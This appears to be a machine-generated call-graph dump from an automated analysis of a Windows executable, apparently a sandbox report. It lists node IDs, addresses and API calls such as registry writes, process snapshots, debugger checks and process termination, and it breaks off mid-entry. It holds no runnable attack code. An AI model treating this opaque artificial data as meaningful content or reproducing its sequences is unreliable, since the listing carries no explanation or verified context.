92353->92354 92355 6f5ddc 92354->92355 92356 6f96d9 8 API calls 92355->92356 92365 6f5e12 92355->92365 92357 6f5e06 92356->92357 92359 6f79ed 8 API calls 92357->92359 92358 6f5ecc GetCurrentProcess IsWow64Process 92360 6f5ee8 92358->92360 92359->92365 92361 7350f2 GetSystemInfo 92360->92361 92362 6f5f00 LoadLibraryA 92360->92362 92363 6f5f4d GetSystemInfo 92362->92363 92364 6f5f11 GetProcAddress 92362->92364 92368 6f5f27 92363->92368 92364->92363 92367 6f5f21 GetNativeSystemInfo 92364->92367 92365->92358 92366 7350ad 92365->92366 92367->92368 92369 6f5f2b FreeLibrary 92368->92369 92370 6f109d 92368->92370 92369->92370 92371 710433 29 API calls __onexit 92370->92371 92371->92350 92372 74506e 92384 6ff7b0 ISource 92372->92384 92374 7002f0 254 API calls 92374->92384 92375 701c50 8 API calls 92375->92384 92376 6fbdc1 39 API calls 92376->92384 92377 763ef6 81 API calls 92377->92384 92378 6fbf07 8 API calls 92378->92384 92379 6ffa91 92381 6fbe6d 8 API calls 92381->92384 92384->92374 92384->92375 92384->92376 92384->92377 92384->92378 92384->92379 92384->92381 92387 70b2d6 254 API calls 92384->92387 92388 7105d2 5 API calls __Init_thread_wait 92384->92388 92389 710433 29 API calls __onexit 92384->92389 92390 710588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 92384->92390 92391 775131 101 API calls 92384->92391 92392 77721e 254 API calls 92384->92392 92387->92384 92388->92384 92389->92384 92390->92384 92391->92384 92392->92384 92393 743bae 92414 75c72e 92393->92414 92395 743bb8 92397 6fef8b 92395->92397 92398 75c72e Sleep 92395->92398 92399 743be3 92395->92399 92420 70a9e5 9 API calls 92395->92420 92407 6ff400 92397->92407 92398->92395 92400 6fb25f 8 API calls 92399->92400 92401 743c13 92400->92401 92421 6fbf39 39 API calls 92401->92421 92403 743c2f 92422 764384 8 API calls 92403->92422 92406 6ff047 92408 6ff41f 92407->92408 92409 6ff433 92407->92409 92423 6fe910 92408->92423 92455 763ef6 81 API calls __wsopen_s 92409->92455 92412 6ff42a 92412->92406 92413 744528 92413->92413 92415 75c754 92414->92415 92416 75c739 92414->92416 92417 75c782 92415->92417 92418 75c770 Sleep 92415->92418 92416->92395 92417->92395 92418->92417 92420->92395 92421->92403 92422->92406 92424 7002f0 254 API calls 92423->92424 92444 6fe94d 92424->92444 92425 743176 92462 763ef6 81 API calls __wsopen_s 92425->92462 92427 6fe9bb ISource 92427->92412 92428 6fea73 92430 6fea7e 92428->92430 92431 6fed85 92428->92431 92429 6fecaf 92432 743167 92429->92432 92433 6fecc4 92429->92433 92435 71016b 8 API calls 92430->92435 92431->92427 92439 71019b 8 API calls 92431->92439 92461 776062 8 API calls 92432->92461 92437 71016b 8 API calls 92433->92437 92434 6feb68 92440 71019b 8 API calls 92434->92440 92442 6fea85 __fread_nolock 92435->92442 92448 6feb1a 92437->92448 92438 71016b 8 API calls 92438->92444 92439->92442 92450 6fead9 ISource __fread_nolock 92440->92450 92441 71016b 8 API calls 92443 6feaa6 92441->92443 92442->92441 92442->92443 92443->92450 92456 6fd210 254 API calls 92443->92456 92444->92425 92444->92427 92444->92428 92444->92431 92444->92434 92444->92438 92444->92450 92446 743156 92460 763ef6 81 API calls __wsopen_s 92446->92460 92448->92412 92450->92429 92450->92446 92450->92448 92451 743131 92450->92451 92453 74310f 92450->92453 92457 6f4485 254 API calls 92450->92457 92459 763ef6 81 API calls __wsopen_s 92451->92459 92458 763ef6 81 API calls __wsopen_s 92453->92458 92455->92413 92456->92450 92457->92450 92458->92448 92459->92448 92460->92448 92461->92425 92462->92427 92463 71078b 92464 710797 ___BuildCatchObject 92463->92464 92493 710241 92464->92493 92466 71079e 92467 7108f1 92466->92467 92470 7107c8 92466->92470 92534 710bcf IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 92467->92534 92469 7108f8 92527 7151e2 92469->92527 92482 710807 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 92470->92482 92504 72280d 92470->92504 92477 7107e7 92479 710868 92512 710ce9 92479->92512 92481 71086e 92516 6f32a2 92481->92516 92482->92479 92530 7151aa 38 API calls 2 library calls 92482->92530 92487 71088a 92487->92469 92488 71088e 92487->92488 92489 710897 92488->92489 92532 715185 28 API calls _abort 92488->92532 92533 7103d0 13 API calls 2 library calls 92489->92533 92492 71089f 92492->92477 92494 71024a 92493->92494 92536 710a28 IsProcessorFeaturePresent 92494->92536 92496 710256 92537 713024 10 API calls 3 library calls 92496->92537 92498 71025b 92499 71025f 92498->92499 92538 7226a7 92498->92538 92499->92466 92502 710276 92502->92466 92505 722824 92504->92505 92506 710e1c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 92505->92506 92507 7107e1 92506->92507 92507->92477 92508 7227b1 92507->92508 92509 7227e0 92508->92509 92510 710e1c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 92509->92510 92511 722809 92510->92511 92511->92482 92589 7126d0 92512->92589 92515 710d0f 92515->92481 92517 6f32ae IsThemeActive 92516->92517 92518 6f3309 92516->92518 92591 7152d3 92517->92591 92531 710d22 GetModuleHandleW 92518->92531 92520 6f32d9 92597 715339 92520->92597 92522 6f32e0 92604 6f326d SystemParametersInfoW SystemParametersInfoW 92522->92604 92524 6f32e7 92605 6f3312 92524->92605 93635 714f5f 92527->93635 92530->92479 92531->92487 92532->92489 92533->92492 92534->92469 92536->92496 92537->92498 92542 72d596 92538->92542 92541 71304d 8 API calls 3 library calls 92541->92499 92545 72d5b3 92542->92545 92546 72d5af 92542->92546 92544 710268 92544->92502 92544->92541 92545->92546 92548 724f8b 92545->92548 92560 710e1c 92546->92560 92549 724f97 ___BuildCatchObject 92548->92549 92567 7232ee EnterCriticalSection 92549->92567 92551 724f9e 92568 72543f 92551->92568 92553 724fad 92559 724fbc 92553->92559 92581 724e1f 29 API calls 92553->92581 92556 724fcd __fread_nolock 92556->92545 92557 724fb7 92582 724ed5 GetStdHandle GetFileType 92557->92582 92583 724fd8 LeaveCriticalSection _abort 92559->92583 92561 710e25 92560->92561 92562 710e27 IsProcessorFeaturePresent 92560->92562 92561->92544 92564 710fee 92562->92564 92588 710fb1 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 92564->92588 92566 7110d1 92566->92544 92567->92551 92569 72544b ___BuildCatchObject 92568->92569 92570 725458 92569->92570 92571 72546f 92569->92571 92585 71f669 20 API calls _abort 92570->92585 92584 7232ee EnterCriticalSection 92571->92584 92574 72545d 92586 722b7c 26 API calls _abort 92574->92586 92576 7254a7 92587 7254ce LeaveCriticalSection _abort 92576->92587 92577 725467 __fread_nolock 92577->92553 92579 725390 __wsopen_s 21 API calls 92580 72547b 92579->92580 92580->92576 92580->92579 92581->92557 92582->92559 92583->92556 92584->92580 92585->92574 92586->92577 92587->92577 92588->92566 92590 710cfc GetStartupInfoW 92589->92590 92590->92515 92592 7152df ___BuildCatchObject 92591->92592 92654 7232ee EnterCriticalSection 92592->92654 92594 7152ea pre_c_initialization 92655 71532a 92594->92655 92596 71531f __fread_nolock 92596->92520 92598 715345 92597->92598 92599 71535f 92597->92599 92598->92599 92659 71f669 20 API calls _abort 92598->92659 92599->92522 92601 71534f 92660 722b7c 26 API calls _abort 92601->92660 92603 71535a 92603->92522 92604->92524 92606 6f3322 __wsopen_s 92605->92606 92607 6fbf07 8 API calls 92606->92607 92608 6f332e GetCurrentDirectoryW 92607->92608 92661 6f4f60 92608->92661 92610 6f3355 IsDebuggerPresent 92611 6f3363 92610->92611 92612 733c7d MessageBoxA 92610->92612 92613 733c95 92611->92613 92614 6f3377 92611->92614 92612->92613 92767 6f40e0 92613->92767 92729 6f3a1c 92614->92729 92621 6f33e9 92623 733cc6 SetCurrentDirectoryW 92621->92623 92624 6f33f1 92621->92624 92623->92624 92625 6f33fc 92624->92625 92775 751ef3 AllocateAndInitializeSid CheckTokenMembership FreeSid 92624->92775 92761 6f345a 7 API calls 92625->92761 92629 733ce1 92629->92625 92631 733cf3 92629->92631 92633 6f551b 10 API calls 92631->92633 92654->92594 92658 723336 LeaveCriticalSection 92655->92658 92657 715331 92657->92596 92658->92657 92659->92601 92660->92603 92662 6fbf07 8 API calls 92661->92662 92663 6f4f76 92662->92663 92776 6f60f5 92663->92776 92665 6f4f94 92666 6fbceb 8 API calls 92665->92666 92667 6f4fa8 92666->92667 92668 6fbe6d 8 API calls 92667->92668 92669 6f4fb3 92668->92669 92790 6f88e8 92669->92790 92672 6fb25f 8 API calls 92673 6f4fcc 92672->92673 92674 6fbdc1 39 API calls 92673->92674 92675 6f4fdc 92674->92675 92676 6fb25f 8 API calls 92675->92676 92677 6f5002 92676->92677 92678 6fbdc1 39 API calls 92677->92678 92679 6f5011 92678->92679 92680 6fbf07 8 API calls 92679->92680 92681 6f502f 92680->92681 92793 6f5151 92681->92793 92685 6f5049 92686 6f5053 92685->92686 92687 734afd 92685->92687 92689 714db8 40 API calls 92686->92689 92688 6f5151 8 API calls 92687->92688 92690 734b11 92688->92690 92691 6f505e 92689->92691 92693 6f5151 8 API calls 92690->92693 92691->92690 92692 6f5068 92691->92692 92694 714db8 40 API calls 92692->92694 92695 734b2d 92693->92695 92696 6f5073 92694->92696 92698 6f551b 10 API calls 92695->92698 92696->92695 92697 6f507d 92696->92697 92699 714db8 40 API calls 92697->92699 92700 734b50 92698->92700 92701 6f5088 92699->92701 92704 6f5151 8 API calls 92700->92704 92702 734b79 92701->92702 92703 6f5092 92701->92703 92706 6f5151 8 API calls 92702->92706 92705 6f50b5 92703->92705 92708 6fbe6d 8 API calls 92703->92708 92707 734b5c 92704->92707 92710 734bb4 92705->92710 92809 6f7d51 92705->92809 92709 734b97 92706->92709 92711 6fbe6d 8 API calls 92707->92711 92712 6f50a8 92708->92712 92713 6fbe6d 8 API calls 92709->92713 92715 734b6a 92711->92715 92716 6f5151 8 API calls 92712->92716 92717 734ba5 92713->92717 92719 6f5151 8 API calls 92715->92719 92716->92705 92720 6f5151 8 API calls 92717->92720 92719->92702 92720->92710 92724 6f88e8 8 API calls 92726 6f50ee 92724->92726 92725 6f8a10 8 API calls 92725->92726 92726->92724 92726->92725 92727 6f5132 92726->92727 92728 6f5151 8 API calls 92726->92728 92727->92610 92728->92726 92730 6f3a29 __wsopen_s 92729->92730 92731 7340b4 ___scrt_fastfail 92730->92731 92732 6f3a42 92730->92732 92734 7340d0 GetOpenFileNameW 92731->92734 92733 6f557e 9 API calls 92732->92733 92735 6f3a4b 92733->92735 92736 73411f 92734->92736 92842 6f39de 92735->92842 92738 6f84b7 8 API calls 92736->92738 92740 734134 92738->92740 92740->92740 93634 6f35ab 7 API calls 92761->93634 92763 6f3401 92768 6f40ee 92767->92768 92769 6f4145 92767->92769 92771 6f40ff 92768->92771 92772 71016b 8 API calls 92768->92772 92770 71016b 8 API calls 92769->92770 92770->92771 92773 6f4154 8 API calls 92771->92773 92772->92771 92774 6f4116 92773->92774 92774->92621 92775->92629 92777 6f6102 __wsopen_s 92776->92777 92778 6f84b7 8 API calls 92777->92778 92779 6f6134 92777->92779 92778->92779 92789 6f616a 92779->92789 92831 6f627c 92779->92831 92781 6fb25f 8 API calls 92782 6f6261 92781->92782 92785 6f684e 8 API calls 92782->92785 92783 6fb25f 8 API calls 92783->92789 92784 6f627c 8 API calls 92784->92789 92786 6f626d 92785->92786 92786->92665 92787 6f684e 8 API calls 92787->92789 92788 6f6238 92788->92781 92788->92786 92789->92783 92789->92784 92789->92787 92789->92788 92791 71016b 8 API calls 92790->92791 92792 6f4fbf 92791->92792 92792->92672 92794 6f515b 92793->92794 92795 6f5179 92793->92795 92796 6f503b 92794->92796 92798 6fbe6d 8 API calls 92794->92798 92797 6f84b7 8 API calls 92795->92797 92799 714db8 92796->92799 92797->92796 92798->92796 92800 714dc6 92799->92800 92801 714e3b 92799->92801 92804 714deb 92800->92804 92834 71f669 20 API calls _abort 92800->92834 92836 714e4d 40 API calls 3 library calls 92801->92836 92803 714e48 92803->92685 92804->92685 92806 714dd2 92835 722b7c 26 API calls _abort 92806->92835 92808 714ddd 92808->92685 92810 6f7d59 92809->92810 92811 71016b 8 API calls 92810->92811 92812 6f7d67 92811->92812 92837 6f8386 92812->92837 92815 6f83b0 92816 6fc700 8 API calls 92815->92816 92817 6f83c0 92816->92817 92818 71019b 8 API calls 92817->92818 92819 6f50d3 92817->92819 92818->92819 92820 6f8a10 92819->92820 92821 6f8a26 92820->92821 92822 736728 92821->92822 92828 6f8a30 92821->92828 92840 70b71c 8 API calls 92822->92840 92823 736735 92841 6fb3fe 8 API calls 92823->92841 92826 6f8b4b 92826->92726 92827 736753 92827->92827 92828->92823 92828->92826 92829 6f8b44 92828->92829 92830 71016b 8 API calls 92829->92830 92830->92826 92832 6fc269 8 API calls 92831->92832 92833 6f6287 92832->92833 92833->92779 92834->92806 92835->92808 92836->92803 92838 71016b 8 API calls 92837->92838 92839 6f50c5 92838->92839 92839->92815 92840->92823 92841->92827 92843 7322f0 __wsopen_s 92842->92843 92844 6f39eb GetLongPathNameW 92843->92844 92845 6f84b7 8 API calls 92844->92845 92846 6f3a13 92845->92846 92847 6f5379 92846->92847 93634->92763 93636 714f6b _abort 93635->93636 93637 714f72 93636->93637 93638 714f84 93636->93638 93674 7150b9 GetModuleHandleW 93637->93674 93659 7232ee EnterCriticalSection 93638->93659 93641 714f77 93641->93638 93675 7150fd GetModuleHandleExW 93641->93675 93642 715029 93663 715069 93642->93663 93646 715000 93651 715018 93646->93651 93656 7227b1 _abort 5 API calls 93646->93656 93648 714f8b 93648->93642 93648->93646 93660 722538 93648->93660 93649 715072 93683 7320c9 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 93649->93683 93650 715046 93666 715078 93650->93666 93652 7227b1 _abort 5 API calls 93651->93652 93652->93642 93656->93651 93659->93648 93684 722271 93660->93684 93703 723336 LeaveCriticalSection 93663->93703 93665 715042 93665->93649 93665->93650 93704 72399c 93666->93704 93669 7150a6 93672 7150fd _abort 8 API calls 93669->93672 93670 715086 GetPEB 93670->93669 93671 715096 GetCurrentProcess TerminateProcess 93670->93671 93671->93669 93673 7150ae ExitProcess 93672->93673 93674->93641 93676 715127 GetProcAddress 93675->93676 93677 71514a 93675->93677 93680 71513c 93676->93680 93678 715150 FreeLibrary 93677->93678 93679 715159 93677->93679 93678->93679 93681 710e1c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 93679->93681 93680->93677 93682 714f83 93681->93682 93682->93638 93687 722220 93684->93687 93686 722295 93686->93646 93688 72222c ___BuildCatchObject 93687->93688 93695 7232ee EnterCriticalSection 93688->93695 93690 72223a 93696 7222c1 93690->93696 93694 722258 __fread_nolock 93694->93686 93695->93690 93697 7222e1 93696->93697 93698 7222e9 93696->93698 93699 710e1c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 93697->93699 93698->93697 93701 722d58 _free 20 API calls 93698->93701 93700 722247 93699->93700 93702 722265 LeaveCriticalSection _abort 93700->93702 93701->93697 93702->93694 93703->93665 93705 7239c1 93704->93705 93706 7239b7 93704->93706 93711 723367 5 API calls 2 library calls 93705->93711 93708 710e1c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 93706->93708 93710 715082 93708->93710 93709 7239d8 93709->93706 93710->93669 93710->93670 93711->93709 93712 741a68 93713 741a70 93712->93713 93716 6fd4e5 93712->93716 93750 7579af 8 API calls __fread_nolock 93713->93750 93715 741a82 93751 757928 8 API calls __fread_nolock 93715->93751 93718 71016b 8 API calls 93716->93718 93720 6fd539 93718->93720 93719 741aac 93721 7002f0 254 API calls 93719->93721 93742 6fc2cd 93720->93742 93722 741ad3 93721->93722 93724 741ae7 93722->93724 93752 7760a2 53 API calls _wcslen 93722->93752 93726 741b04 93726->93716 93753 7579af 8 API calls __fread_nolock 93726->93753 93728 71016b 8 API calls 93734 6fd61e ISource 93728->93734 93730 6fc34b 8 API calls 93740 6fd95c ISource 93730->93740 93731 6fbe6d 8 API calls 93731->93734 93734->93731 93735 741f1c 93734->93735 93736 741f37 93734->93736 93738 6fc34b 8 API calls 93734->93738 93739 6fd8c1 ISource 93734->93739 93754 6fb3fe 8 API calls 93734->93754 93755 7555d9 8 API calls ISource 93735->93755 93738->93734 93739->93730 93739->93740 93741 6fd973 93740->93741 93749 70e284 8 API calls ISource 93740->93749 93746 6fc2dd 93742->93746 93743 6fc2e5 93743->93728 93744 71016b 8 API calls 93744->93746 93745 6fbf07 8 API calls 93745->93746 93746->93743 93746->93744 93746->93745 93747 6fbe6d 8 API calls 93746->93747 93748 6fc2cd 8 API calls 93746->93748 93747->93746 93748->93746 93749->93740 93750->93715 93751->93719 93752->93726 93753->93726 93754->93734 93755->93736 93756 6f1033 93761 6f6686 93756->93761 93760 6f1042 93762 6fbf07 8 API calls 93761->93762 93763 6f66f4 93762->93763 93769 6f55cc 93763->93769 93766 6f6791 93767 6f1038 93766->93767 93772 6f68e6 8 API calls __fread_nolock 93766->93772 93768 710433 29 API calls __onexit 93767->93768 93768->93760 93773 6f55f8 93769->93773 93772->93766 93774 6f55eb 93773->93774 93775 6f5605 93773->93775 93774->93766 93775->93774 93776 6f560c RegOpenKeyExW 93775->93776 93776->93774 93777 6f5626 RegQueryValueExW 93776->93777 93778 6f565c RegCloseKey 93777->93778 93779 6f5647 93777->93779 93778->93774 93779->93778 93780 70230c 93781 702315 __fread_nolock 93780->93781 93783 747487 93781->93783 93786 702366 93781->93786 93787 71016b 8 API calls 93781->93787 93790 701fa7 __fread_nolock 93781->93790 93791 71019b 8 API calls 93781->93791 93792 6f8e70 93781->93792 93815 6f662b 8 API calls __fread_nolock 93783->93815 93785 747493 93789 6fbe6d 8 API calls 93785->93789 93785->93790 93788 6f7cb3 8 API calls 93786->93788 93787->93781 93788->93790 93789->93790 93791->93781 93793 6f8e85 93792->93793 93794 6f8e82 93792->93794 93795 6f8e8d 93793->93795 93796 6f8ebb 93793->93796 93794->93781 93816 715556 26 API calls 93795->93816 93798 736b10 93796->93798 93801 6f8ecd 93796->93801 93806 736a29 93796->93806 93819 715513 26 API calls 93798->93819 93799 6f8e9d 93805 71016b 8 API calls 93799->93805 93817 70fe8f 51 API calls 93801->93817 93802 736b28 93802->93802 93807 6f8ea7 93805->93807 93808 736aa2 93806->93808 93810 71019b 8 API calls 93806->93810 93809 6fb25f 8 API calls 93807->93809 93818 70fe8f 51 API calls 93808->93818 93809->93794 93811 736a72 93810->93811 93812 71016b 8 API calls 93811->93812 93813 736a99 93812->93813 93814 6fb25f 8 API calls 93813->93814 93814->93808 93815->93785 93816->93799 93817->93799 93818->93798 93819->93802 93820 6ff470 93823 709fa5 93820->93823 93822 6ff47c 93824 709fc6 93823->93824 93829 70a023 93823->93829 93826 7002f0 254 API calls 93824->93826 93824->93829 93830 709ff7 93826->93830 93827 74800f 93827->93827 93828 70a067 93828->93822 93829->93828 93832 763ef6 81 API calls __wsopen_s 93829->93832 93830->93828 93830->93829 93831 6fbe6d 8 API calls 93830->93831 93831->93829 93832->93827 93833 700e6f 93834 700e83 93833->93834 93839 7013d5 93833->93839 93835 700e95 93834->93835 93836 71016b 8 API calls 93834->93836 93837 7455d0 93835->93837 93840 700eee 93835->93840 93935 6fb3fe 8 API calls 93835->93935 93836->93835 93936 761a29 8 API calls 93837->93936 93839->93835 93843 6fbe6d 8 API calls 93839->93843 93859 70044d ISource 93840->93859 93866 702ad0 93840->93866 93843->93835 93844 7462cf 93940 763ef6 81 API calls __wsopen_s 93844->93940 93845 71016b 8 API calls 93864 700326 ISource 93845->93864 93846 701e00 40 API calls 93846->93864 93847 701645 93852 6fbe6d 8 API calls 93847->93852 93847->93859 93849 7461fe 93939 763ef6 81 API calls __wsopen_s 93849->93939 93850 6fbe6d 8 API calls 93850->93864 93851 745c7f 93856 6fbe6d 8 API calls 93851->93856 93851->93859 93852->93859 93856->93859 93857 7105d2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 93857->93864 93858 6fbf07 8 API calls 93858->93864 93860 7460b9 93937 763ef6 81 API calls __wsopen_s 93860->93937 93862 710433 29 API calls pre_c_initialization 93862->93864 93863 700a5e ISource 93938 763ef6 81 API calls __wsopen_s 93863->93938 93864->93844 93864->93845 93864->93846 93864->93847 93864->93849 93864->93850 93864->93851 93864->93857 93864->93858 93864->93859 93864->93860 93864->93862 93864->93863 93865 710588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 93864->93865 93934 701940 254 API calls 2 library calls 93864->93934 93865->93864 93867 702f70 93866->93867 93868 702b36 93866->93868 94236 7105d2 5 API calls __Init_thread_wait 93867->94236 93870 702b50 93868->93870 93871 747b7c 93868->93871 93874 7030e0 9 API calls 93870->93874 94241 7779f9 254 API calls 93871->94241 93873 702f7a 93876 702fbb 93873->93876 93879 6fb25f 8 API calls 93873->93879 93877 702b60 93874->93877 93875 747b88 93875->93864 93882 747b91 93876->93882 93883 702fec 93876->93883 93878 7030e0 9 API calls 93877->93878 93880 702b76 93878->93880 93886 702f94 93879->93886 93880->93876 93881 702bac 93880->93881 93881->93882 93901 702bc8 __fread_nolock 93881->93901 94242 763ef6 81 API calls __wsopen_s 93882->94242 94238 6fb3fe 8 API calls 93883->94238 94237 710588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 93886->94237 93887 747bb4 93887->93864 93888 702ff9 94239 70e662 254 API calls 93888->94239 93891 747bb9 94243 763ef6 81 API calls __wsopen_s 93891->94243 93893 747c1c 94245 7760a2 53 API calls _wcslen 93893->94245 93894 702cfc 93896 7030e0 9 API calls 93894->93896 93897 702d09 93896->93897 93902 7030e0 9 API calls 93897->93902 93909 747d45 93897->93909 93898 71016b 8 API calls 93898->93901 93899 71019b 8 API calls 93899->93901 93900 703032 94240 70fe59 8 API calls 93900->94240 93901->93887 93901->93888 93901->93891 93901->93898 93901->93899 93906 7002f0 254 API calls 93901->93906 93907 702cef 93901->93907 93908 747bfd 93901->93908 93904 702d23 93902->93904 93904->93909 93911 6fbe6d 8 API calls 93904->93911 93914 702d87 ISource 93904->93914 93906->93901 93907->93893 93907->93894 94244 763ef6 81 API calls __wsopen_s 93908->94244 93909->93887 94246 763ef6 81 API calls __wsopen_s 93909->94246 93911->93914 93912 7030e0 9 API calls 93912->93914 93913 702edd 93913->93864 93914->93887 93914->93900 93914->93909 93914->93912 93916 702e3b ISource 93914->93916 93930 6f7953 CloseHandle 93914->93930 93941 7695f6 93914->93941 93956 77ecc9 93914->93956 93961 77ac49 93914->93961 93966 7665b4 93914->93966 93971 77cd16 93914->93971 94060 77a4b4 93914->94060 94066 764ad5 93914->94066 94071 70be75 93914->94071 94128 76874a 93914->94128 94155 765ed5 93914->94155 94185 768e39 93914->94185 94204 70f95e 93914->94204 94211 766561 93914->94211 94218 75e9c5 GetFileAttributesW 93914->94218 94220 766d2d 93914->94220 94233 779eea 93914->94233 93915 70e29c 8 API calls 93915->93916 93916->93913 93916->93915 93930->93914 93934->93864 93935->93835 93936->93859 93937->93863 93938->93859 93939->93859 93940->93859 93942 6fbf07 8 API calls 93941->93942 93943 769607 93942->93943 93944 6f8e70 52 API calls 93943->93944 93945 769616 93944->93945 93946 6f557e 9 API calls 93945->93946 93947 769621 93946->93947 93948 6f8e70 52 API calls 93947->93948 93949 76962e 93948->93949 93950 6f8e70 52 API calls 93949->93950 93951 769640 93950->93951 93952 6f8e70 52 API calls 93951->93952 93953 769655 WritePrivateProfileStringW 93952->93953 93954 769677 93953->93954 93955 76966b WritePrivateProfileStringW 93953->93955 93954->93914 93955->93954 94247 759b57 93956->94247 93958 77ecd5 94266 6f7a59 8 API calls 93958->94266 93960 77ecf1 93960->93914 93962 6f8e70 52 API calls 93961->93962 93963 77ac65 93962->93963 94274 75dc9c CreateToolhelp32Snapshot Process32FirstW 93963->94274 93965 77ac74 93965->93914 93967 6f8e70 52 API calls 93966->93967 93968 7665c7 93967->93968 94292 75e387 lstrlenW 93968->94292 93970 7665d1 93970->93914 93972 6fbf07 8 API calls 93971->93972 93973 77cd39 93972->93973 93974 6fbf07 8 API calls 93973->93974 93975 77cd42 93974->93975 93976 6fbf07 8 API calls 93975->93976 93977 77cd4b 93976->93977 93978 6f8e70 52 API calls 93977->93978 93981 77cdda 93977->93981 93979 77cd71 93978->93979 94297 77d6b1 93979->94297 93981->93914 93982 77cda5 94323 77d2f7 93982->94323 93984 77cdd6 93984->93981 93985 77ce0f RegConnectRegistryW 93984->93985 93986 77ce76 RegCreateKeyExW 93984->93986 93985->93981 93985->93986 93988 77cf0e 93986->93988 93997 77cead 93986->93997 93989 77d1d6 RegCloseKey 93988->93989 93990 6f8e70 52 API calls 93988->93990 93989->93981 93991 77d1e9 RegCloseKey 93989->93991 93992 77cf29 93990->93992 93991->93981 93993 714db8 40 API calls 93992->93993 93994 77cf38 93993->93994 93995 77cf96 93994->93995 93996 77cf44 93994->93996 94000 6f8e70 52 API calls 93995->94000 93998 6f8e70 52 API calls 93996->93998 93997->93981 93999 77ceff RegCloseKey 93997->93999 94001 77cf4e _wcslen 93998->94001 93999->93981 94002 77cfa0 94000->94002 94007 6f8e70 52 API calls 94001->94007 94003 714db8 40 API calls 94002->94003 94004 77cfaf 94003->94004 94005 77d047 94004->94005 94006 77cfbf 94004->94006 94008 6f8e70 52 API calls 94005->94008 94009 6f8e70 52 API calls 94006->94009 94010 77cf70 94007->94010 94011 77d051 94008->94011 94012 77cfc9 _wcslen 94009->94012 94013 6f8e70 52 API calls 94010->94013 94014 714db8 40 API calls 94011->94014 94019 6f8e70 52 API calls 94012->94019 94059 77cf85 94013->94059 94015 77d060 94014->94015 94017 77d156 94015->94017 94018 77d070 94015->94018 94016 77d2bb RegSetValueExW 94016->93989 94055 77d01f 94016->94055 94022 6f8e70 52 API calls 94017->94022 94020 6f8e70 52 API calls 94018->94020 94021 77cfeb 94019->94021 94024 77d07a 94020->94024 94025 6f8e70 52 API calls 94021->94025 94023 77d160 94022->94023 94026 714db8 40 API calls 94023->94026 94027 71019b 8 API calls 94024->94027 94028 77d000 RegSetValueExW 94025->94028 94029 77d16f 94026->94029 94030 77d09f 94027->94030 94028->93989 94028->94055 94031 77d215 94029->94031 94032 77d17f 94029->94032 94033 6f8e70 52 API calls 94030->94033 94035 6f8e70 52 API calls 94031->94035 94333 6fc92d 94032->94333 94046 77d0b4 94033->94046 94037 77d21f 94035->94037 94036 77d187 94038 6f8e70 52 API calls 94036->94038 94039 714db8 40 API calls 94037->94039 94040 77d198 RegSetValueExW 94038->94040 94041 77d22e 94039->94041 94040->93989 94040->94055 94044 77d265 94041->94044 94045 77d23a 94041->94045 94042 6f8e70 52 API calls 94048 77d106 RegSetValueExW 94042->94048 94047 6f8e70 52 API calls 94044->94047 94338 6fc5df 39 API calls 94045->94338 94046->94042 94050 77d26f 94047->94050 94048->94055 94052 714db8 40 API calls 94050->94052 94051 77d242 94053 6f8e70 52 API calls 94051->94053 94054 77d27e 94052->94054 94053->94040 94054->94055 94339 76276a 10 API calls 94054->94339 94055->93989 94057 77d296 94058 6f8e70 52 API calls 94057->94058 94058->94059 94059->94016 94064 77a4c7 94060->94064 94061 6f8e70 52 API calls 94062 77a534 94061->94062 94341 7617be 94062->94341 94064->94061 94065 77a4d6 94064->94065 94065->93914 94067 6f8e70 52 API calls 94066->94067 94068 764ae8 94067->94068 94382 75da81 94068->94382 94070 764af0 94070->93914 94394 6f6ab6 94071->94394 94074 71016b 8 API calls 94076 70bea6 94074->94076 94077 71019b 8 API calls 94076->94077 94079 70beb7 94077->94079 94078 748f7a 94118 70bf1f 94078->94118 94427 76a607 39 API calls 94078->94427 94080 6f7953 CloseHandle 94079->94080 94081 70bec2 94080->94081 94083 6fbf07 8 API calls 94081->94083 94082 6fc92d 39 API calls 94084 748fdc 94082->94084 94085 70beca 94083->94085 94086 748fe4 94084->94086 94087 70bf2c 94084->94087 94088 6f7953 CloseHandle 94085->94088 94090 6fc92d 39 API calls 94086->94090 94089 70fdc9 3 API calls 94087->94089 94091 70bed1 94088->94091 94095 70bf33 94089->94095 94090->94095 94092 6f8e70 52 API calls 94091->94092 94093 70bedd 94092->94093 94094 6f7953 CloseHandle 94093->94094 94096 70bee7 94094->94096 94097 748ff9 94095->94097 94098 70bf4e 94095->94098 94100 6f6e52 5 API calls 94096->94100 94099 71019b 8 API calls 94097->94099 94101 6f7a14 8 API calls 94098->94101 94103 748ffe 94099->94103 94104 70bef8 94100->94104 94102 70bf56 94101->94102 94408 70bfbc 94102->94408 94108 749012 94103->94108 94110 6f41c9 2 API calls 94103->94110 94105 70bf00 94104->94105 94106 748f72 94104->94106 94113 6f6b12 13 API calls 94105->94113 94426 6f7923 CloseHandle ISource 94106->94426 94116 749016 __fread_nolock 94108->94116 94428 761759 8 API calls ___scrt_fastfail 94108->94428 94109 70bf65 94109->94116 94423 6f7a59 8 API calls 94109->94423 94110->94108 94115 70bf0e 94113->94115 94422 6f6afb SetFilePointerEx SetFilePointerEx SetFilePointerEx 94115->94422 94118->94082 94118->94087 94119 70bf79 94122 70bfb3 94119->94122 94123 6f7953 CloseHandle 94119->94123 94120 70bf15 94120->94118 94121 748f3b 94120->94121 94425 75d4bf SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 94121->94425 94122->93914 94125 70bfa7 94123->94125 94125->94122 94424 6f7923 CloseHandle ISource 94125->94424 94126 748f52 94126->94118 94129 76875a __wsopen_s 94128->94129 94130 6f8e70 52 API calls 94129->94130 94131 76877b 94130->94131 94132 